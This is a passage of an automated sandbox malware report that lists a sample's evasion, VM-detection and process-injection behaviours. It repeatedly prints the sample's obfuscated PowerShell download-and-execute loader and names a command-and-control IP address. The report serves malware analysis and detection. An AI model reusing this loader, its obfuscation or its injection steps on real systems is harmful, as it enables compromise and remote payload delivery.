                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT caption, serialnumber FROM Win32_DiskDrive
                        Switches to a custom stack to bypass stack traces
                        Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFDB442D044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 54AB83A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6560Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3314Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6992Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2622Jump to behavior
                        Source: C:\Windows\System32\wscript.exe TID: 5536Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 7676Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F90B80 FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,23_3_00007DF416F90B80
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FFD66C GetSystemInfo,23_3_00007DF416FFD66C
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIAJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\AcrobatJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DCJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\CacheJump to behavior
                        Source: wscript.exe, 00000000.00000003.2164391636.0000019A9B9F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166806098.0000019A9BA14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166438855.0000019A9BA0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2164769829.0000019A9BA18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2187620756.0000019A9BA16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2185104998.0000019A9BA16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165994185.0000019A9BA14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2167108907.0000019A9BA14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`b
                        Source: wscript.exe, 00000000.00000003.2185104998.0000019A9BA16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                        Source: msiexec.exe, 00000013.00000003.2708452120.0000000024620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                        Source: wscript.exe, 00000000.00000003.2163447256.0000019A9BA62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165994185.0000019A9BA62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2164391636.0000019A9BA62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2187620756.0000019A9BA62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166806098.0000019A9BA62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2167108907.0000019A9BA62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2185104998.0000019A9BA62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2164769829.0000019A9BA62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166438855.0000019A9BA62000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2348383471.0000020FCC7CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3434297818.0000020984456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: msiexec.exe, 00000013.00000003.2708452120.0000000024620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_07845B88 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,12_2_07845B88
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_3_007C0283 mov eax, dword ptr fs:[00000030h]22_3_007C0283

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Early bird code injection technique detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.120.127.215 3847Jump to behavior
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: amsi64_524.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 524, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7756, type: MEMORYSTR
                        Allocates memory in foreign processes
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 26E58410000 protect: page read and write
                        Queues an APC in another process (thread injection)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3A60000Jump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeMemory written: C:\Windows\System32\dllhost.exe base: 26E58410000
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeMemory written: C:\Windows\System32\dllhost.exe base: 7FF642EC14E0
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no DeJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmpshare.exe "C:\Program Files\Windows Media Player\wmpshare.exe"Jump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$blodudtrdningen='afhndede';;$noncooperator='cryophorus';;$thalassinian='josephina';;$maste193='forslvendes';;$downthrust=$host.name; function symboltabeller($blowtube){if ($downthrust) {$morphogenic='ukammerater';$overstegne=2;$smugleriernes=$overstegne}do{$usaglige+=$blowtube[$smugleriernes];$smugleriernes+=3} until(!$blowtube[$smugleriernes])$usaglige}function cleavingly($ethnicon){ .($gudmors) ($ethnicon)}$medioanterior=symboltabeller 'ben eexttw.f w';$medioanterior+=symboltabeller 'reeunblacb,lo,i kebrn ft';$forstdelsernes=symboltabeller 'rym ro dz.riopl,aldeaam/';$udlodning=symboltabeller 'p t.klbls f1se2';$rival='n [,in be sttr.fjsase mrgivmoisacnee mpbeo cibonanttime a lnedapagdoecor,l] : d: ss emoc u krs i ttsayfopb.r so t po bcklo,rlf =vu$ us dduld oped en,ei dnnig';$forstdelsernes+=symboltabeller 'mo5s .no0mo t(tiwimi.on pd oavwdoso. lynchtf. p1 e0me.af0k,;ap cowt iminsn6 4f ; unx,a6 u4ac; l fargrvga:.e1ab3u 1in.s 0 f)la logu,e kchokino l/.u2sh0 e1un0ha0me1 f0sa1 i kefidi argre rf jo nx l/t 1,a3ac1ca. ,0';$hoejkulturer=symboltabeller ' duansgneb rti- audg ,e on .t';$eliksirers=symboltabeller '.oh pt tc,panspl:fe/ni/chwinw hwd . atundskesij .bde.chc ho am ./exew fsk/ stokprislf tp ep r nn xet .scsche ea e>unh ftd,t np she:fl/.l/,iw swbew .o a,krgeemrcseo ksa afolaud gagatanu srmie,e.spi kt ./ seenfpf/ rs.eketiinfsutmeeh.r,anamead.v sane ia';$programmeringsskik1=symboltabeller 'a >';$gudmors=symboltabeller ' bic eh x';$strudsmaven='circumscript';$fastprissystemet='\even.lar';cleavingly (symboltabeller '.a$esga.lepoarblaakal e: ai goved fi sn .etrs b=a,$stebrnu vap:emab pmapmedc a tt agu+s $ fe,abes tsepsirfoiges.es,uytis.mt teo ms.ek,t');cleavingly (symboltabeller ' c$ang olkvohabroa lkv:spvk a .apabloerenbofruatebder aistkdy=pr$ resolazi dkt,s kiskrune .r fsch.sasnepprlopitetra( a$anpsyr roubgvirfuavim.amskefor ei ond.g wsm sr kprihekte1 ,)');cleavingly (symboltabeller $rival);$eliksirers=$vaabenfabrik[0];$portor=(symboltabeller 're$prg,tlneow,bs.ap lf,:.aafrtdienol i ,e kr .v eiden fdwhumeer = anu enywin- kotrbstj,yebrcmitde besryy os.ttr.ea mka. i$ bm lelyd siraoulapena.t eedir itho r');cleavingly ($portor);cleavingly (symboltabeller 's $.iavitbaemilmiitoewirinvegiunntidduupae e. hs es a dprescr ,s s[wu$vrhruo,pe jh,kscu ul kthyuenru ed r e].r=an$plfp obirpasadtkad.be elbisa enerl nteefus');$pastina=symboltabeller 've$sea ett,e ll oi,oemirruvkaimin tdopu aesk. fd uo wopn cl,iodeal d kf,ei el sed (bo$saefel li,iknas ei nr decorbesbe,in$ sbotfiem.mfin pi bnddg osh.fapu plledobtot)';$stemningsfuldt=$iodines;cleavingly (symboltabeller 'sm$ agk.lanoc,bg.a.rl u:afw iemoe ukmdechn ed hus dsefaal,ru gretunehar tn fe is t= e(ertc e suntp -alp rao,tfohc vi$,rs ntkie sm bn aiunneggfis.ofwaur lafd t.a)');while (!$weekendudflugternes) {cleavingly (symboltabeller ' g$geghelb,o ,b a klan:trf,no de
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$blodudtrdningen='afhndede';;$noncooperator='cryophorus';;$thalassinian='josephina';;$maste193='forslvendes';;$downthrust=$host.name; function symboltabeller($blowtube){if ($downthrust) {$morphogenic='ukammerater';$overstegne=2;$smugleriernes=$overstegne}do{$usaglige+=$blowtube[$smugleriernes];$smugleriernes+=3} until(!$blowtube[$smugleriernes])$usaglige}function cleavingly($ethnicon){ .($gudmors) ($ethnicon)}$medioanterior=symboltabeller 'ben eexttw.f w';$medioanterior+=symboltabeller 'reeunblacb,lo,i kebrn ft';$forstdelsernes=symboltabeller 'rym ro dz.riopl,aldeaam/';$udlodning=symboltabeller 'p t.klbls f1se2';$rival='n [,in be sttr.fjsase mrgivmoisacnee mpbeo cibonanttime a lnedapagdoecor,l] : d: ss emoc u krs i ttsayfopb.r so t po bcklo,rlf =vu$ us dduld oped en,ei dnnig';$forstdelsernes+=symboltabeller 'mo5s .no0mo t(tiwimi.on pd oavwdoso. lynchtf. p1 e0me.af0k,;ap cowt iminsn6 4f ; unx,a6 u4ac; l fargrvga:.e1ab3u 1in.s 0 f)la logu,e kchokino l/.u2sh0 e1un0ha0me1 f0sa1 i kefidi argre rf jo nx l/t 1,a3ac1ca. ,0';$hoejkulturer=symboltabeller ' duansgneb rti- audg ,e on .t';$eliksirers=symboltabeller '.oh pt tc,panspl:fe/ni/chwinw hwd . atundskesij .bde.chc ho am ./exew fsk/ stokprislf tp ep r nn xet .scsche ea e>unh ftd,t np she:fl/.l/,iw swbew .o a,krgeemrcseo ksa afolaud gagatanu srmie,e.spi kt ./ seenfpf/ rs.eketiinfsutmeeh.r,anamead.v sane ia';$programmeringsskik1=symboltabeller 'a >';$gudmors=symboltabeller ' bic eh x';$strudsmaven='circumscript';$fastprissystemet='\even.lar';cleavingly (symboltabeller '.a$esga.lepoarblaakal e: ai goved fi sn .etrs b=a,$stebrnu vap:emab pmapmedc a tt agu+s $ fe,abes tsepsirfoiges.es,uytis.mt teo ms.ek,t');cleavingly (symboltabeller ' c$ang olkvohabroa lkv:spvk a .apabloerenbofruatebder aistkdy=pr$ resolazi dkt,s kiskrune .r fsch.sasnepprlopitetra( a$anpsyr roubgvirfuavim.amskefor ei ond.g wsm sr kprihekte1 ,)');cleavingly (symboltabeller $rival);$eliksirers=$vaabenfabrik[0];$portor=(symboltabeller 're$prg,tlneow,bs.ap lf,:.aafrtdienol i ,e kr .v eiden fdwhumeer = anu enywin- kotrbstj,yebrcmitde besryy os.ttr.ea mka. i$ bm lelyd siraoulapena.t eedir itho r');cleavingly ($portor);cleavingly (symboltabeller 's $.iavitbaemilmiitoewirinvegiunntidduupae e. hs es a dprescr ,s s[wu$vrhruo,pe jh,kscu ul kthyuenru ed r e].r=an$plfp obirpasadtkad.be elbisa enerl nteefus');$pastina=symboltabeller 've$sea ett,e ll oi,oemirruvkaimin tdopu aesk. fd uo wopn cl,iodeal d kf,ei el sed (bo$saefel li,iknas ei nr decorbesbe,in$ sbotfiem.mfin pi bnddg osh.fapu plledobtot)';$stemningsfuldt=$iodines;cleavingly (symboltabeller 'sm$ agk.lanoc,bg.a.rl u:afw iemoe ukmdechn ed hus dsefaal,ru gretunehar tn fe is t= e(ertc e suntp -alp rao,tfohc vi$,rs ntkie sm bn aiunneggfis.ofwaur lafd t.a)');while (!$weekendudflugternes) {cleavingly (symboltabeller ' g$geghelb,o ,b a klan:trf,no de
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$blodudtrdningen='afhndede';;$noncooperator='cryophorus';;$thalassinian='josephina';;$maste193='forslvendes';;$downthrust=$host.name; function symboltabeller($blowtube){if ($downthrust) {$morphogenic='ukammerater';$overstegne=2;$smugleriernes=$overstegne}do{$usaglige+=$blowtube[$smugleriernes];$smugleriernes+=3} until(!$blowtube[$smugleriernes])$usaglige}function cleavingly($ethnicon){ .($gudmors) ($ethnicon)}$medioanterior=symboltabeller 'ben eexttw.f w';$medioanterior+=symboltabeller 'reeunblacb,lo,i kebrn ft';$forstdelsernes=symboltabeller 'rym ro dz.riopl,aldeaam/';$udlodning=symboltabeller 'p t.klbls f1se2';$rival='n [,in be sttr.fjsase mrgivmoisacnee mpbeo cibonanttime a lnedapagdoecor,l] : d: ss emoc u krs i ttsayfopb.r so t po bcklo,rlf =vu$ us dduld oped en,ei dnnig';$forstdelsernes+=symboltabeller 'mo5s .no0mo t(tiwimi.on pd oavwdoso. lynchtf. p1 e0me.af0k,;ap cowt iminsn6 4f ; unx,a6 u4ac; l fargrvga:.e1ab3u 1in.s 0 f)la logu,e kchokino l/.u2sh0 e1un0ha0me1 f0sa1 i kefidi argre rf jo nx l/t 1,a3ac1ca. ,0';$hoejkulturer=symboltabeller ' duansgneb rti- audg ,e on .t';$eliksirers=symboltabeller '.oh pt tc,panspl:fe/ni/chwinw hwd . atundskesij .bde.chc ho am ./exew fsk/ stokprislf tp ep r nn xet .scsche ea e>unh ftd,t np she:fl/.l/,iw swbew .o a,krgeemrcseo ksa afolaud gagatanu srmie,e.spi kt ./ seenfpf/ rs.eketiinfsutmeeh.r,anamead.v sane ia';$programmeringsskik1=symboltabeller 'a >';$gudmors=symboltabeller ' bic eh x';$strudsmaven='circumscript';$fastprissystemet='\even.lar';cleavingly (symboltabeller '.a$esga.lepoarblaakal e: ai goved fi sn .etrs b=a,$stebrnu vap:emab pmapmedc a tt agu+s $ fe,abes tsepsirfoiges.es,uytis.mt teo ms.ek,t');cleavingly (symboltabeller ' c$ang olkvohabroa lkv:spvk a .apabloerenbofruatebder aistkdy=pr$ resolazi dkt,s kiskrune .r fsch.sasnepprlopitetra( a$anpsyr roubgvirfuavim.amskefor ei ond.g wsm sr kprihekte1 ,)');cleavingly (symboltabeller $rival);$eliksirers=$vaabenfabrik[0];$portor=(symboltabeller 're$prg,tlneow,bs.ap lf,:.aafrtdienol i ,e kr .v eiden fdwhumeer = anu enywin- kotrbstj,yebrcmitde besryy os.ttr.ea mka. i$ bm lelyd siraoulapena.t eedir itho r');cleavingly ($portor);cleavingly (symboltabeller 's $.iavitbaemilmiitoewirinvegiunntidduupae e. hs es a dprescr ,s s[wu$vrhruo,pe jh,kscu ul kthyuenru ed r e].r=an$plfp obirpasadtkad.be elbisa enerl nteefus');$pastina=symboltabeller 've$sea ett,e ll oi,oemirruvkaimin tdopu aesk. fd uo wopn cl,iodeal d kf,ei el sed (bo$saefel li,iknas ei nr decorbesbe,in$ sbotfiem.mfin pi bnddg osh.fapu plledobtot)';$stemningsfuldt=$iodines;cleavingly (symboltabeller 'sm$ agk.lanoc,bg.a.rl u:afw iemoe ukmdechn ed hus dsefaal,ru gretunehar tn fe is t= e(ertc e suntp -alp rao,tfohc vi$,rs ntkie sm bn aiunneggfis.ofwaur lafd t.a)');while (!$weekendudflugternes) {cleavingly (symboltabeller ' g$geghelb,o ,b a klan:trf,no deJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
